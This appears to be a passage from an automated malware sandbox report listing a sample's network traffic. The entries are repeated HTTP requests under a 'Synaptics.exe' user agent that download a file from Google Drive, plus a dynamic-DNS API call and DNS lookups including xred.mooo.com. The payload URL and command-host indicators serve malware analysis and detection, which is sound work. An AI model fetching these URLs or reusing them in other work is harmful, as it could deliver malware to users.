                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
